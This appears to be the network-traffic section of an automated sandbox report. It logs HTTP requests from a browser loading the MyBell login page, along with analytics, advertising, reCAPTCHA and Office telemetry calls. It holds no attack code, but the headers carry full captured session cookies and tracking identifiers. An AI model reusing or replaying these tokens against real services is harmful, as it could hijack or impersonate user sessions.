Source: global trafficHTTP traffic detected: GET /_r?sdk=web2.85.0&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__1 HTTP/1.1Host: app.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://support.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _s=bSIHRGqn9rL3nJ2hRxT4ssO5k%2FFjfBiEcV6oWbASilINqVOmeni4p8hvKqSbWcOb
Source: global trafficHTTP traffic detected: GET /TeaLeaf/TealeafTarget.aspx HTTP/1.1Host: mybell.bell.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtSa=-; __cwaf=true; ASP.NET_SessionId=xekfkxdqg0g3hnhhj5c40x2j; at_check=true; AMCVS_48B034FA53CF9FD10A490D44%40AdobeOrg=1; AKA_A2=A; zone=zone=&city=Killeen&pcd=&isp=&ispconnectiontype=; TLP020a4695=028702b9c9c05a52921ccf3c31971699d213c39112484a31e547d2c2ffd38687ed59a36d0d4e2c0fc94de624e710b589015e25b0a3d820fda1dd28f1c1d871dd22fc12e6551b85cc0f44234e0afad0602c52a8cfebcfcf76961c87bb9de0e4034f922fa52610cf06c4bd0238fec9db15133395a516b29fc258302c7437258fc2b9533f20552b7afc5e2687b7696ede3c85851dd344ebbe563d42f62457d7f06efc569272c8603ab277efb2634e0358dfc98b74cf5c; AMCV_48B034FA53CF9FD10A490D44%40AdobeOrg=179643557%7CMCIDTS%7C20028%7CMCMID%7C26404690240998747124274156036452379072%7CMCAAMLH-1730985129%7C6%7CMCAAMB-1730985129%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730387529s%7CNONE%7CMCSYNCSOP%7C411-20035%7CvVersion%7C5.5.0; s_cc=true; gemini=region=ON|language=en|province=ON|LarSegmentType=undefined; _gcl_au=1.1.441004151.1730380345; BSCC=LoginSplashReturnURL=%2fLogin%3f_branch_match_id%3d1380522052703713689%26_branch_referrer%3dH4sIAAAAAAAAA8soKSkottLXz9VLSs3J0UtO1C8uLSjILyopKkzOT0m1rytKTUstKsrMS49PKsovL04tsnXOKMrPTQUAvip8pzkAAAA%253D; TLP025e8c23=028702b9c9692b4dde036b6f48311953767db06bb285a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c29da432a12f8fa973d6859ab4b9bf95d3d7ea5f56b8892bb8e17037a1f126e985c999dbd1d07c44d5ec8afaf2f6bb844bb17f3c07a5a7f83cd49351c2a911a5ca947d27a817d368faf54ae7e50a1842d2b57eac716f3ff3d0a55c9e8e128aa760d11afd37cabc7f1a9c13b24f5f873137471b379be7b6e2d795395816a5e8e1f2e418f6d39798439073d7d47d8e5abb89ebedced3714008024baabac0c69bb2b73489c2f92cfe3f6a21e9266ad18a9c7cb790e717910a9e948fabaca8f62d40d2453a6de990f7f33c7a1d85b4a989e357ccfff80ec2e3cb27aa1f5a73d036513baa2d2abdce10e77339c62a8affda7f305fa37c0ac2205be35ede10778493b158f1f1e1a6959a697f73147ac5311b7831b3fc19af85631ac85ef42f6348c117fb4da443ecd17f5697ed6f1588649dddab457ecda2b35cd23c48
Source: global trafficHTTP traffic detected: GET /ecm3?ex=adobe.com&id=26594250982175076714259318767746782479 HTTP/1.1Host: s.amazon-adsystem.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ad-id=A416tCsuyE62q0ke3351vrU; ad-privacy=0
Source: global trafficHTTP traffic detected: GET /i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380341691&dc=13&dv=1&dl=287&retryCode=socketNotConnected HTTP/1.1Host: collection.decibelinsight.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3
Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/953414520/?random=1730380345423&cv=11&fst=1730380345423&bg=ffffff&guid=ON&async=1&gtm=45be4as0h1v9172277568za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101533422~101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fmybell.bell.ca%2FLogin%3Flanguage%3Den&hn=www.googleadservices.com&frm=0&tiba=Log%20in%20to%20MyBell&npa=0&pscdl=noapi&auid=441004151.1730380345&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUluOG7rAMHEbdj-Ua_R3N0vCtoIba9CQhUZwM7uJdinHDgXKrZfaghEmRLXyZM
Source: global trafficHTTP traffic detected: GET /recaptcha/enterprise/clr?k=6LeIfTIaAAAAAHMPXsezv4PdsckDc-wAJU-eo2YP HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ANOXeZxfxzYBwcz7Gnvqu3Y83ZbiHyue1AJYczF16kXnMrYQu4vUb1Eg9Z0jpwvMDzXecLZHMeVchD3odA4owgc
Source: global trafficHTTP traffic detected: GET /i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380341691&dc=14&dv=1&dl=1354 HTTP/1.1Host: collection.decibelinsight.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3
Source: global trafficHTTP traffic detected: GET /i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380341691&dc=16&dv=1&dl=188 HTTP/1.1Host: collection.decibelinsight.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3
Source: global trafficHTTP traffic detected: GET /i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380341691&dc=17&dv=1&dl=150 HTTP/1.1Host: collection.decibelinsight.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3
Source: global trafficHTTP traffic detected: GET /_r?sdk=web2.85.0&_t=1380522052703713689&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__3 HTTP/1.1Host: app.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _s=bSIHRGqn9rL3nJ2hRxT4ssO5k%2FFjfBiEcV6oWbASilINqVOmeni4p8hvKqSbWcOb
Source: global trafficHTTP traffic detected: GET /_r?sdk=web2.85.0&_t=1380522052703713689&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__2 HTTP/1.1Host: app.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _s=bSIHRGqn9rL3nJ2hRxT4ssO5k%2FFjfBiEcV6oWbASilINqVOmeni4p8hvKqSbWcOb
Source: global trafficHTTP traffic detected: GET /_r?sdk=web2.85.0&_t=1380522052703713689&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__1 HTTP/1.1Host: app.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _s=bSIHRGqn9rL3nJ2hRxT4ssO5k%2FFjfBiEcV6oWbASilINqVOmeni4p8hvKqSbWcOb
Source: global trafficHTTP traffic detected: GET /_r?sdk=web2.85.0&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__0 HTTP/1.1Host: app.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _s=bSIHRGqn9rL3nJ2hRxT4ssO5k%2FFjfBiEcV6oWbASilINqVOmeni4p8hvKqSbWcObIf-None-Match: W/"5b-5gxRPCEPhFM2aFWOY0O0uslI6Hg"
Source: global trafficHTTP traffic detected: GET /i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380341691&dc=15&dv=1&dl=193 HTTP/1.1Host: collection.decibelinsight.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3
Source: global trafficHTTP traffic detected: GET /s/player/78fcc867/www-widgetapi.vflset/www-widgetapi.js HTTP/1.1Host: www.youtube.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=y2NTPw373Io; VISITOR_INFO1_LIVE=BGaSvGoSIE0; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgGA%3D%3D
Source: global trafficHTTP traffic detected: GET /i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380341691&dc=18&dv=1&dl=217 HTTP/1.1Host: collection.decibelinsight.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3
Source: global trafficHTTP traffic detected: GET /b/ss/bellca/10/JS-2.22.0-LEWM/s08712474510957?AQB=1&ndh=1&pf=1&callback=s_c_il[1].doPostbacks&et=1&t=31%2F9%2F2024%209%3A12%3A25%204%20240&d.&nsid=0&jsonv=1&.d&sdid=03870B84460DADFF-291E557ADEB59CD2&mid=26404690240998747124274156036452379072&aamlh=6&ce=UTF-8&cdp=2&pageName=Login&g=https%3A%2F%2Fmybell.bell.ca%2FLogin%3Flanguage%3Den&c.&di_session_id_ms=0.00&di_launch_lib_ms=14123.70&di_session_id=di-693653-84E654F18AD2AE89A616AA13A6B4CC6A8F&.c&cc=CAD&ch=Login&server=xdqn9denqtys%2F4vqsiohi0zc%2B409oxcu1obi2gvjxyy%3D&events=event1%2Cevent19%2Cevent39%2Cevent83%2Cevent151&aamb=6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y&c1=D%3Dv1&v1=false&v3=false&c6=D%3Dv135&c9=Login&c10=D%3Dv46&c12=D%3Dv3&c13=D%3Dv31&c14=https%3A%2F%2Fmybell.bell.ca%2Flogin&v14=D%3Dv13&c16=D%3Dv18&c21=D%3Dv21&v21=en-on&v23=759a09cf-47c2-3ce7-804c-25098e01ffa8&v29=D%3Dv25&v30=001&c32=D%3Dv2&v32=26404690240998747124274156036452379072&c33=Login&c36=D%3Dv36&v36=Thursday-9%3A00AM&c37=D%3Dv37&v37=1&c44=D%3Dv102&c45=No%20Referrer&v46=Login&c50=LAUNCH%5Bproduction%20Published%20on%3A%202024-10-29T16%3A55%3A46Z%5D&v51=https%3A%2F%2Fmybell.bell.ca%2FLogin%3Flanguage%3Den&c55=D%3Dv77&c57=D%3Dv30&c58=D%3Dv60&v64=dock%20is%20not%20present%3Ai&c65=2024-10-31%2C09%3A12%3A24.002%2C2024-10-31%2C09%3A11%3A53.540&v67=e60da217-072c-41c7-969e-7adbf82ba8be%3A759a09cf-47c2-3ce7-804c-25098e01ffa8&c68=Login&c70=D%3DUser-Agent&c73=D%3Dv17&c75=Login&v75=D%3DUser-Agent&v77=001-1-0&v103=Launch%20%7Casync&v136=User&v145=Page%20load&v151=di-693653-84E654F18AD2AE89A616AA13A6B4CC6A8F&v160=074d78d6-7e50-4974-a9af-c4727a62784e&v162=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23&v179=not%20available&s=1280x1024&c=24&j=1.6&v=N&k=Y&bw=1280&bh=907&mcorgid=48B034FA53CF9FD10A490D44%40AdobeOrg&AQE=1 HTTP/1.1Host: data1.bell.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtSa=-; __cwaf=true; at_check=true; AMCVS_48B034FA53CF9FD10A490D44%40AdobeOrg=1; AKA_A2=A; zone=zone=&city=Killeen&pcd=&isp=&ispconnectiontype=; TLP020a4695=028702b9c9c05a52921ccf3c31971699d213c39112484a31e547d2c2ffd38687ed59a36d0d4e2c0fc94de624e710b589015e25b0a3
Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /api/web/events HTTP/1.1Host: analytics-fe.digital-cloud.medallia.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rb_bced360d-a02a-4b73-b0e7-46fe5ae1dc34?type=js3&sn=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0&svrid=8&flavor=post&vi=OSRWPKERGJKLBVFCIANBBATQHLJBBKCA-0&modifiedSince=1730276476420&rf=https%3A%2F%2Fmybell.bell.ca%2FLogin%3F_branch_match_id%3D1380522052703713689%26_branch_referrer%3DH4sIAAAAAAAAA8soKSkottLXz9VLSs3J0UtO1C8uLSjILyopKkzOT0m1rytKTUstKsrMS49PKsovL04tsnXOKMrPTQUAvip8pzkAAAA%253D%23EXT%3Dbranch_supportrqcode&bp=3&app=429b1eac4514c5ce&crc=388109577&en=gticcd0a&end=1 HTTP/1.1Host: mybell.bell.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtSa=-; __cwaf=true; ASP.NET_SessionId=xekfkxdqg0g3hnhhj5c40x2j; at_check=true; AMCVS_48B034FA53CF9FD10A490D44%40AdobeOrg=1; AKA_A2=A; zone=zone=&city=Killeen&pcd=&isp=&ispconnectiontype=; TLP020a4695=028702b9c9c05a52921ccf3c31971699d213c39112484a31e547d2c2ffd38687ed59a36d0d4e2c0fc94de624e710b589015e25b0a3d820fda1dd28f1c1d871dd22fc12e6551b85cc0f44234e0afad0602c52a8cfebcfcf76961c87bb9de0e4034f922fa52610cf06c4bd0238fec9db15133395a516b29fc258302c7437258fc2b9533f20552b7afc5e2687b7696ede3c85851dd344ebbe563d42f62457d7f06efc569272c8603ab277efb2634e0358dfc98b74cf5c; AMCV_48B034FA53CF9FD10A490D44%40AdobeOrg=179643557%7CMCIDTS%7C20028%7CMCMID%7C26404690240998747124274156036452379072%7CMCAAMLH-1730985129%7C6%7CMCAAMB-1730985129%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730387529s%7CNONE%7CMCSYNCSOP%7C411-20035%7CvVersion%7C5.5.0; s_cc=true; gemini=region=ON|language=en|province=ON|LarSegmentType=undefined; _gcl_au=1.1.441004151.1730380345; BSCC=LoginSplashReturnURL=%2fLogin%3f_branch_match_id%3d1380522052703713689%26_branch_referrer%3dH4sIAAAAAAAAA8soKSkottLXz9VLSs3J0UtO1C8uLSjILyopKkzOT0m1rytKTUstKsrMS49PKsovL04tsnXOKMrPTQUAvip8pzkAAAA%253D; TLP025e8c23=028702b9c9692b4dde036b6f48311953767db06bb285a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c29da432a12f8fa973d6859ab4b9bf95d3d7ea5f56b8892bb8e17037a1f126e985c999dbd1d07c44d5ec8afaf2f6bb844bb17f3c07a5a7f83
Source: global trafficHTTP traffic detected: GET /i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380341691&dc=19&dv=1&dl=1066 HTTP/1.1Host: collection.decibelinsight.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3
Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
